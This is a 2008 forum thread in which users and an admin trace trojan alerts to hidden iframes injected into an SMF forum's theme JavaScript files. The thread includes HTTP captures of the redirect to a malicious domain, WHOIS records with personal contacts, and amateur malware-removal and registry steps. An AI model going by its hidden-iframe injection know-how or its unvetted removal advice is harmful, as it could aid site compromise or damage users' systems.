WARNING!
My virus protection alerted against "s e x.exe" that was sneaked into my system on this site.
I used IE at the time being. I have now switched to Firefox.
Stefan, please check your AD suppliers for any suspicious Trojans.....
I had the same experience today, several Ad's tried to install a trojan downloader, antivirus caught it but we should not have to be wary of OU's website do we?
Stefan,
Please investigate your ad suppliers, they are playing dirty. or at least seem to be.
some 1 set up a pole and lets remove the damn adds ....come on stef..F***K the adds
At home I use firefox with Adsblock, all the crap is removed :) but at office I got the same problem with IE I got attacked by trojan today to....
Also they are some problem with the size, I am configurated to expand the view. but 50% of the time its not expanded, its frustating, I reload the page sometime 3-4 times to get it right, so many bandwidth lost!
And I get (User 'hartiberlin1' has exceeded the 'max_questions' resource (current value: 100000)) so many time like right now when I want to post.....
OMG.. You mean people are still using Internet Explorer.. l-o-l good old internet newbies...lol
( no offense for people at work.) Although you should tell your company to use firefox for security.
USE Mozilla FIREFOX with the plugins: NOscript and adblock.
==============================================================
If you feel firefox seems slow about loading webpages.. then do this tweak here:
It was a must do.... Although the latest firefox download may already have these set.
===============================================================
1.Type "about:config" into the address bar and hit return.
Scroll down and look for the following entries:
network.http.pipelining network.http.proxy.pipelining network.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to a number like 30.
This means it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0".
This value is the amount of time the browser waits before it acts on information it recieves.
-----------------------------------------------------------------------------------------------------------------------------------------------
=========================================================================
Want more tweaks: How bout a small registry tweak for faster webpage requesting:
=========================================================================
* If you don't know how to get to the registry, then you probably shouldn't. You've been warned newbies.
* And be sure your changing the correct entries. I will not be held liable for your silly mistakes.
* Create a system restore point if you feel you may make a silly mistake.
* Or right down the values that your changing.
=========================================================================
Navigate to this registry entry and change the following settings:
For XP & 2K and VISTA
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider
For 98, 98SE & ME
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\ServiceProvider
On the right for ALL OS's change these entries: (ALL values are HEXIDECIMAL)
Class - 1
DnsPriority - 1
HostsPriority - 1
LocalPriority - 1
NetbtPriority - 1
MY Default settings for XP Home/ and Vista Home Premium 32bit were: ( In HexDicemal )
Class - 8
DnsPriorty - 7d0
HostPriorty - 1f4
LocalPriority - 1f3
NetbtPriorty - 7d1
You are changing those five to 1. Can't be any simplier than that.
After that, you must re-start your pc for the changes to take effect.
=======================================================================
* Both of those tweaks made my dial-up a heck of a lot better in loading webpages.
Those two tweaks are the first thing I do on a new pc. Tested on: XP Home and Vista Home Premium 32bit.
I know my vista was ungodly slow for loading webpages... I even had to take the dial-up modem from my old xp pc.
The factory modem was just junk..only connecting at 28800bps..lol .while my xp pc factory modem was pretty good.
------------------------------------------------------------------------------------------------------------------------------------------------
Please let me know, which ad block did this ?
Please check the source code of the page and let me know.
As I only have text mode wap access right now, I can not see it myself.
Thanks.
Sorry. There is no way to see where it gets access to ones system.
I use Symantec and the only clue I get is this warning window.
And right now the trojan is active on my computer. It keeps coming back by itself.
Symantec can't find and desinfect the source and I cannot find it either.
Very annoying.
people ,this forum is not safe anymore.
LEAVE WHILE YOU CAN IF NOT TOO LATE
make sure you use good anti virus/spyware protection.
i have just recieved this warning and not even on my own computer.
this is verry uncomfortable.
Hi Marco,
I don?t see this trojan horse
as I am back now at home.
Please let me know,
which forum page exactly tried to load the trojan.
Also this IP adress you listed is not my server,
so it must have been loaded from somewhere else.
I just have scanned my PC and it clean.
Did this trojan only occur with IE or also with Firefox ?
Thanks.
Regards, Stefan.
I noticed the trojan on the "index page" - using IE
Yeah my stuff was out of date and it got me...shame on me.
Hi Grumpy
do you still see it on the Homepage ?
I am using Firefox and all seems to work okay right
now without any Trojan.
Also there is no code in any page to this:
http://88.xxxx address that Marco posted...
Was on a different system when I encountered the trojan.
My current system is much tougher.
It may be opportunistic - infecting only the weak systems.
I picked up a Trojan yesterday off of the index page. I am using ie and 2 firewalls and 2 active virus scanners. One picked it up and warned me, and I told it not to run the script, but it got through and it took me like 4 hours to get rid of it.
Trojan: Java.dl.Open Conn.C
It was finally removed with PC Tools. It hit me as the index page was loading. (which usually only takes like 1 second or so)
Has anyone else seen this one here too?
Bill
I am using Gutsy Gibbon Ubuntu with Firefox and ClamTk virusscanner, so far so good.
Are there Linux users having problems with this Trojan?
I have ubuntu here.
Stefan, The issue is with IE I believe, I got hit at work when loading the index page for the forums, at home I use FF and have not had any issues. Symantec caught the issue at work and fortunately I was able to get rid of it. Like Grumpy, my home system is hardened much better.
In my opinion, it should not matter what operating system or browser one is using...there should not be ANY trojans here!!! They are obviously associated with one or more of the ads and this needs to be checked out.
Bill
Hi All,
does your PC also want to make a connection
to the site:
orentraff.cn
??
I have now deactivated all ad blocks
and still every forum page wants to make a connection
to
orentraff.cn
So it must be coded somewhere into the php files,
which I did not find yet.
Can somebody help me to track this down please ?
The sourcecode does not show any iframe link to this site
nor does Firefox page information show anything...
Where does it hide ??
Stefan,
I bet you your DNS service is inserting it if it cannot be found in the source code of you web pages.
here is a link discussing this, the link is encrypted so you do not see it directly
http://www.globedomain.com/forums/viewtopic.php?f=3&t=2857
How many servers is your DB on? It appears that the offending site call comes and goes, could it be that a mirror of yours is infected?
more info on this malware gang, these are Russian hackers.
http://ddanchev.blogspot.com/2007/11/new-media-malware-gang.html
I was looking is this your domain or the hoster?
http://www.w3.org/1999/xhtml
it still connects to the site, but the alert is gone.
http://www.overunity.com/index.php
GET /index.php HTTP/1.1
Host: www.overunity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.overunity.com/index.php?action=forum
Cookie: SMFCookie11=a%3A4%3A%7Bi%3A0%3Bs%3A4%3A%223834%22%3Bi%3A1%3Bs%3A40%3A%226ce775d84aada0cb081928ac878a4e2fbdb4104f%22%3Bi%3A2%3Bi%3A1374524675%3Bi%3A3%3Bi%3A0%3B%7D; __utma=140742380.1068190726.1198593065.1198932286.1198956070.6; __utmz=140742380.1194179925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=94f7b935b23a9dfc8e1b044760bbd93c
If-Modified-Since: Fri, 11 Jan 2008 18:52:03 GMT
HTTP/1.x 200 OK
Date: Fri, 11 Jan 2008 18:52:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.3
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Fri, 11 Jan 2008 18:52:26 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 4081
Keep-Alive: timeout=10
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
----------------------------------------------------------
h ttp://orentraff.cn/tdsslam/index.php?out=1193100109
GET /tdsslam/index.php?out=1193100109 HTTP/1.1
Host: orentraff.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.overunity.com/index.php
HTTP/1.x 200 OK
Date: Fri, 11 Jan 2008 18:52:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
----------------------------------------------------------
the 88.255.94.14 adress is not the orentraff.cn adress this is 203.117.111.102
so the first adress redirected to the second adress.
the first seems to be a turkish company and the second australian.
-----------------------------------------
Domain Name: orentraff.cn ->> 203.117.111.102
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: N/A
Registrant Name: NizovGrisha
Administrative Email: grishanizov@gmail.com
Sponsoring Registrar: ????????????
Name Server:ns1.all-traff.com
Name Server:ns2.all-traff.com
Registration Date: 2007-10-02 05:14
Expiration Date: 2008-10-02 05:14
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
ReferralServer: whois://whois.apnic.net
NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7
NetName: APNIC-CIDR-BLK
NetHandle: NET-202-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: DNS1.TELSTRA.NET
Comment: This IP address range is not registered in the ARIN database.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
Comment: ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment: for the Asia Pacific region. APNIC does not operate networks
Comment: using this IP address range and is not able to investigate
Comment: spam or abuse reports relating to these addresses. For more
Comment: help, refer to http://www.apnic.net/info/faq/abuse
Comment:
RegDate: 1994-04-05
Updated: 2005-05-20
OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3188
OrgTechEmail: search-apnic-not-arin@apnic.net
# ARIN WHOIS database, last updated 2008-01-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 203.117.0.0 - 203.117.255.255
netname: STARHUBINTERNET-SG
descr: root
country: SG
admin-c: NS110-AP
tech-c: NS110-AP
mnt-by: MAINT-AS4657-AP
status: ALLOCATED NON-PORTABLE
changed: admin_ipdb@starhub.com 20070605
source: APNIC
person: NOC SHI
nic-hdl: NS110-AP
e-mail: noc@starhub.com
address: 19 TaiSeng Drive
address: Singapore 535222
phone: +65 6825 7878
fax-no: +65 6821 6012
country: SG
changed: ipadmin@starhub.com 20060607
mnt-by: MAINT-AS4657-AP
source: APNIC
--------------------------------------------------------------
88.255.94.14
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 88.0.0.0 - 88.255.255.255
CIDR: 88.0.0.0/8
NetName: 88-RIPE
NetHandle: NET-88-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2004-04-01
Updated: 2004-04-06
# ARIN WHOIS database, last updated 2008-01-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '88.255.94.0 - 88.255.94.255'
inetnum: 88.255.94.0 - 88.255.94.255
netname: AbdAllah_Internet
descr: AbdAllah Internet Hizmetleri
descr: Etnografya Muze mevkii Kirazlik Mh. No:32 Rize
country: tr
admin-c: MAG87-RIPE
tech-c: MAG87-RIPE
status: assigned pa
mnt-by: as9121-mnt
source: RIPE # Filtered
person: Mahmod AbdAllah el Gashmi
address: AbdAllah Internet Hizmetleri
e-mail: ipadmin@ahlen.biz
phone: +90 543 3767728
remarks: ------------------------------------------------------
remarks: Routing and peering issues: ipadmin@ahlen.biz
remarks: SPAM and Network security issues: abuse@ahlen.biz
remarks: Customer support: ipadmin@ahlen.biz
remarks: General information: ipadmin@ahlen.biz
remarks: ------------------------------------------------------
nic-hdl: MAG87-RIPE
mnt-by: sistem-net-mnt
source: RIPE # Filtered
% Information related to '88.255.0.0/16AS9121'
route: 88.255.0.0/16
descr: TurkTelekom
origin: AS9121
mnt-by: AS9121-MNT
source: RIPE # Filtered
i am using mozilla on my own computer and it works fine.
but i just tried to load the forum page in IE6 and it gave another trojan alert.
so IE6 users be ware..
if you look into your msconfig you can switch it off if you are infected.
Somehow somebody must have inserted an iframe into one file of my forum,
but I have not yet found the file,
where it is inserted.
If somebody familar with the SMF software can help ?
the index.php file calls many other PHP files
and I really must find this now..
Okay, I
saw now via my FTP program that these
3 files were changed at the 7th of January:
sha1.js
script.js
fader.js
located in the
/Themes/default
directory and they each contain
an Iframe to the
orentraff.cn
site.
I must now check,
what the files normally do
and if I can just delete them
or if I have to edit out the
Iframe...
edit out the iframe call, the code was probably inserted at or near the end of the file
can't you just restore/overwrite it all exept for the database??
the default theme worked fine for me you know :)
glad you found it...i hope it takes out the bugs we had lately
M.
Yes, I replaced the files from the original
SMF forum software archive and changed now the FTP passwords,
so this should all be resolved now.
I will post this now to the SMF community to warn other
SMF forum software admins.
Regards, Stefan.
Back with a vengeance
See attached screenshot
Hans
Hans:
I just got that too a few minutes ago. Then, I could not get on the site at all. But now, it seems fine. I am now running Mozilla Firefox ALL the time. Chinese hackers are probably attacking this site.
Bill
Still the same shit here
Hans
As of this minute it has returned to normal again
Hans
I got that and when I reloaded it cleared
My hoster had a DNS problem a few minutes ago.
Now it is fixed again.
I hope we have resolved now this issue.
I cannot longer expand the screen, its hard to navigate without it! The option no longer exist?
EDITED:
Ok now it work, I needed to navigate in the profile section to re-enable it by magic.
Quote from: hartiberlin on January 11, 2008, 04:39:53 PM
My hoster had a DNS problem a few minutes ago.
Now it is fixed again.
I hope we have resolved now this issue.
Let us hope so.
Thank you Stefan for the hard work put in by you to get the thing going again. I am sure all of us appreciate your effort.
Greetings
Hans von Lieven
Yes Stefan, thanks for fixing this. A good thing came out of this for me as I had forgotten how easy and fun firefox is to use and today, I made it my default browser. I also beefed up my antivirus soffware with some additional downloads which is never a bad thing to do.
Bill
Shit ..... I got it too.
I was at the damn US patent site that only really works with IE, and without thinking I browsed here instead of with my regular Firefox.
First I removed Internet Explorer from Windows XP. FINI IE TABARNAC.
Did some heavy duty sword fighting with the bastard and found this out.
from what I can tell, it uploaded onto the my computer from the OU index page to;
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Temporary Internet Files\Content.IE5\C1QFG567\images2[1]\00000063.js
Virus name: VBS/Psyme
It probably activated itself before my virus scanner could catch it. It was updated yesterday.
Stefan, you may try to do a search for this file on the server 00000063.js
My virus checker also deleted this one.
C:\WINDOWS\system32\drivers\smtpdrv.sys
Virus name: Generic dx
smtpdrv.sys Trojan deleted
Spy-Agent.bv.dldr
Trojan Discovered : 03/27/2007,Risk: Low-Profiled
vil.nai.com/vil/content/v_141846.htm - 26k - Cached
The "Spy-Agent.bv.dldr" trojan is designed to download Spy-Agent.bv files from a remote site.
Upon execution, the trojan drops the following files:
* %Windir%\System32\drivers\ip6fw.sys (Spy-Agent.bv.dldr)
(Cannot yet delete. It pops back seconds later)
* %Windir%\System32\drivers\runtime.sys (Spy-Agent.bv.dldr)
(Manually Deleted)
* %Windir%\System32\5_exception.nls (Spy-Agent.bv.dldr)
(Manually Deleted)
(Where %Windir% is the Windows folder, e.g. C:\Windows)
It adds the following registry keys:
Remove these.
* HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Runtime
"ImagePath" = \??\%Windir%\System32\drivers\runtime.sys
"ErrorControl" = 1
"Start" = 3
"Type" = 1
* HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Runtime "ImagePath"
"ImagePath" = \??\%Windir%\System32\drivers\runtime.sys
"ErrorControl" = 1
"Start" = 3
"Type" = 1
Open C:\WINDOWS\regedit.exe
and remove the above registry keys; BE CAREFUL WITH REGEDIT!!!!!!
The trojan injects a code into the process "IExplore.exe". The injected code attempts to download files from the following remote site.
* 66.246.252.[removed]
I found the file here;
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Temporary Internet Files\\Content.IES\C1QFG567\216.195.55[1].HTML
Cannot yet delete this file.
You won't be able to see the above directory with Windows Explorer. You will need ztreewin. I have attached the file ZTW.ZIP. Create a directory as C:\ZTW download this file there then unzip it. Link to it from your desktop the ZTW.EXE. This is the best low level drive browser out there. Very powerful and indespensible when hunting these rats.
Symptoms - Existence of mentioned files and registry keys.
Method of Infection -
Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, etc.
If you did the above changes, then before rebooting you have to dissable the Windows Restore so it does not re-install itself from a backup.
WindowsXP
Disabling the System Restore Utility (Windows XP Users)
1. Right click the My Computer icon on the Desktop and click on Properties.
2. Click on the System Restore tab.
3. Put a check mark next to 'Turn off System Restore on All Drives'.
4. Click the 'OK' button.
5. You will be prompted to restart the computer. Click Yes.
Now I am getting an Explorer.exe error
AppName: explorer.exe AppVer: 6.0.2900.2180 ModName: winhttp.dll
ModVer: 5.1.2600.2180 Offset: 00018fa0
I moved C:\windows\system32\winhttp.dll to a newly created directory that I named "aaa-hold" in case I needed it.
There are also some tmp files that cannot be deleted.
My computer crashed a few times.
Now I will re-boot with my Windows 98 start up diskette and remove those stray files under Dos.
What a total waste of time.
This board is useless with dial up, and has a signal/noise
ratio of around 200:1. No wonder we have bandwidth issues.
And now this.
At least this sort of thing never happened with YahooGroups.
If you want to serve best the new energy community, Stefan,
you need to do some hard thinking about the future.
Paul.
wattsup
If that thing is re-inserting itself you have a root kit working on your system.
It loads into the Master Boot record and inserts code that runs when windows starts.
You need a root kit remover to find it.
try http://www.gmer.net/index.php
It should locate it..
You may need to reinstall the MBR by starting up windows CD and using the tools dialog ask it to "fixmbr"
It should re-write the list...
Noobs stop using IE or Windows...!
News source that uses English and not geek
http://news.bbc.co.uk/2/hi/technology/default.stm
http://news.bbc.co.uk/2/hi/technology/6035455.stm
For the admin of this site...
Hackers can use third party websites to inject the bad stuff.
They use an iframe with zero dimensions...ie its not visable on the page, but its there, an iframe is like running a website inside a website within the html on your browser. They manipulate IE easily and use simple tricks like cancel buttons that are not....
I have had several run code in VM and they all worked on IE and very well. Inserted a code as a cookie or as an image / download set to auto run. IE does this!
Once on the machine they buzz a website, bought and paid for by CC theft, they then download more stuff and your PC becomes a Zombie..
So
One or more of the adds have or could have an Iframe in the code or someone hosting this web server has shit security..(ie MD hosting)
If that is the case they can read your emails, the data base everything...and include code in the index.php to insert an Iframe...should be all encrypted in a long hash..
One more thing..
Get mint Linux or Ubuntu Linux and run the cd from boot up..it will start Linux without installing it, you can use the disk manager to erase the MBR and backup the user folder (including program settings) from windows should you choose to re-install it. If not install mint or Ubuntu and have a great trouble free PC....
Hello,
Mr. TT's website seems to be also infected now with a trojan downloader, so careful please! >:(
http://www.trawoeger-pyramide.info
atlantex
Can someone tell me please how I can get rid of IE Explorer. I don't want it on my machine but I don't seem to be able to get rid of it.
Hans von Lieven
Quote from: hansvonlieven on January 29, 2008, 02:06:23 AM
Can someone tell me please how I can get rid of IE Explorer. I don't want it on my machine but I don't seem to be able to get rid of it.
Hans von Lieven
I don't think you can get rid of it, as its integrated with windows. Just use don't use ie and no problems.
Hello Hans,
http://reviews.cnet.com/4520-10166_7-6219945-1.html
QuoteThere is a way to remove Internet Explorer from Windows, but it's not worth the hassle. Whether or not you realize it, you actually do need IE; it's used throughout Windows. For example, Outlook, Word, Windows Explorer--basically any apps that need to render HTML--all rely on IE to some degree. If you remove IE, which requires editing your system registry files (something I don't recommend unless you have experience and a good backup first), you'll then have to associate these apps with another Web rendering product in order to view, for example, HTML-enabled e-mail. Not impossible, but I'm sure you have better use for your time. Instead, simply drag and drop your IE icon to the trash and just forget about it.
Load linux. I'm using Ubuntu and booting from a cd.
Hope that helps.
Bessler007
Quote from: wattsup on January 12, 2008, 01:31:30 AM
. . .
I was at the damn US patent site that only really works with IE, and without thinking I browsed here instead of with my regular Firefox.
. . .
www.freepatentsonline.com/
works with modzilla/firefox.
Bessler007
I have dropped the shortcuts and icons associated with IE a long time ago into the bin but it still keeps running in the background at times
Hans von Lieven
I use XPlite at http://www.litepc.com to remove all Windows programs I do not want on my computer. I had kept IE because when you go to the USA patent web site,
http://www.uspto.gov/patft/index.html
images are not seen well in Firefox - shit. So I used IE. But now, no more. Finito IE.
Outlook Express and all other Windows communications programs are removed.
I use Eudora for E-mail. It's the best e-mail program around. Especially when you have different e-mail accounts.
All the best.
Quote from: atlantex on January 29, 2008, 01:30:29 AM
Hello,
Mr. TT's website seems to be also infected now with a trojan downloader, so careful please! >:(
http://www.trawoeger-pyramide.info
atlantex
Moizilla Exolorer:
Acsess denied : Virus
Thanks Wattsup,
I have just downloaded XPLite. I was surprised as it is actually free for personal use. Sounds just the thing. Now I can get rid of all that cumbersome shit in windows I need like a hole in the head.
Thanks again, well done
Hans von Lieven
Hello Hans,
better you install a good virus scanner than try to get rid of the IE and destable your system with such actions.
Trojan-Downloader.HTML.Agent.ij
that's the enemy on TT's site.
atlantex
@Hans
No prob.
May I recommend you do a system backup before you use xplite, then do another one after you have removed your unwantoms.
I am also putting up a copy of my RegCleaner program. It is an old version of 2001 but it is strong and great to use to clean up the system registry, start-up programs, etc. I will leave it here for a few days then remove it. The new version of this is called RegSupreme. When using this, check the StartUp List section. It should not be filled with programs being launched at computer start-up. My XP only has two lines that are relative to my high performance audio card and that's it. All other lines are removed.
If you go in Options, Registry CleanUP, OLE Cleaner then choose Extra Powerful.
Then go to Tools, Registry Cleanup, and choose Do them all. This will scan the complete registry and list all lines that are just junk. You then remove these. All removed items go the the Backups section. Keep these there for a few days just to make sure nothing went wrong. Never does but hey, you''re never to careful. You can then remove them from backup whenever. Anytime you install a new program, check this program in the Start-Up to make sure they did not hog your resources at Start-Up. Also if you go there and see a line, remove it and it comes back on its own, this is a trojan or virus doing it mayhem. Ouch.
Enjoy the power and control.
unfortunately it is part of the windows OS, so you cannot get rid of it unless you flush windows out of the PC and load something else like Linux.
Sorry. Only alternative to that is leave it alone but load firefox or another browser.
Sorry guys,
XPLite is not so free, if you want to get rid of Internet Explorer you have to buy the programme for 40 bucks.
Hans von Lieven
I don't reccommend XPlite, but if you must use something for IE, I'd go with nLite instead as it's technically better, it's free, and it's well supported.
get it here http://www.nliteos.com/ (http://www.nliteos.com/)
tak
Thanks Tak,
Downloading now. ;D
Hans
Okay, as this trojan issue is fixed.
I close now this thread.